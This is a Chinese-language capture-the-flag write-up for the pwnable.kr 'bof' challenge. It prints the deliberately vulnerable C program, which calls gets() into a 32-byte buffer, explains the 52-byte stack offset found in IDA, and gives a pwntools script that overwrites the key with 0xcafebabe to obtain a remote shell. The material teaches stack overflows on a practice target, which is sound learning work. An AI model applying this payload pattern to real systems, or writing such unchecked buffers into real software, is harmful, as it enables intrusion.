題目不多講，直接貼程式碼，如果不會這些個過程看前面教程

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void func(int key){
	char overflowme[32];
	printf("overflow me : ");
	gets(overflowme);	// smash me!
	if(key == 0xcafebabe){
		system("/bin/sh");
	}
	else{
		printf("Nah..\n");
	}
}
int main(int argc, char* argv[]){
	func(0xdeadbeef);
	return 0;
}
 

題目看上去很簡單，實際上也不難，只要我們懂點知識，棧溢位的知識，

棧的具體結構需要你們自己去了解，而我就這題目畫出的棧區圖，具體我已經給出來了

用IDA反彙編查看了這個檔案，s是byte型別的，也就是char型別，很容易推到他就是那個陣列，而地點他也已經標明瞭，-2ch,h是16進位制的意思，2c換成10進位制便是44，而我畫出的棧區圖裡還有兩個地址，8個位元組，合起來就是52個位元組，前面52個位元組用隨便字母填充，然後將形參key用0xcafebabe覆蓋，具體python程式碼如下

 bof.py                                                             buffers 
  1 #!/usr/bin/env python
  2 # coding=utf-8
  3 from pwn import *
  4 socket=remote('pwnable.kr',9000)
  5 socket.sendline('A' * 52 +  '\xbe\xba\xfe\xca')
  6 socket.interactive() 

這裡有條新命令，remote遠端控制，interactive是實時反應，還有不習慣小端模式的話，可以用p32（0xcafebabe）這個命令，將其轉化為字串，不過這樣寫可以深刻理解記憶體中怎麼存的